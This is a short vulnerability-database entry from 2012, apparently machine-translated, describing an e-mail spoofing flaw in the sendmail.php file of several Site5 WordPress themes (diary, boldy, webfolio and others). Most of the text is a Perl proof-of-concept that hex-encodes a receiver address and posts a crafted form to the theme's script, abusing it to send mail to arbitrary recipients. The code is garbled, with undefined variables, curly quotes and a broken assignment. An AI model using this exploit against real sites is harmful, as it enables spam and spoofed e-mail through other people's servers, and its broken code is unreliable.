Site5 WordPress e-mail spoofing vulnerability-vulnerability warning-the black bar safety net

2012-07-16T00:00:00
ID MYHACK58:62201234335
Type myhack58
Reporter 佚名
Modified 2012-07-16T00:00:00

Description

The following is to use the local build of the site5 wordpress

Vulnerability file:

diary, simploblack, simplo, journalcrunch, boldy, webfolio

my $theme = ‘diary’;

my $url = $wordpress.’wp-content/themes/’.$ theme.’/ sendmail.php’;

My e-mail=“test.five@yahoo.cn;

Receiver email address

my $receiver = ‘test.five@yahoo.cn’;

$receiver =~ s/(.)/ sprintf(“%x”,ord($1))/eg;

my $ua = LWP::UserAgent->new();

my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver = > $receiver, submit => 'submit', ] );

print “Sending request to $url\n”;

my $content = $ua->request($request)->as_string();

print $content;

print “\nDone\nFollow \@BallastSec on Twitter\n”;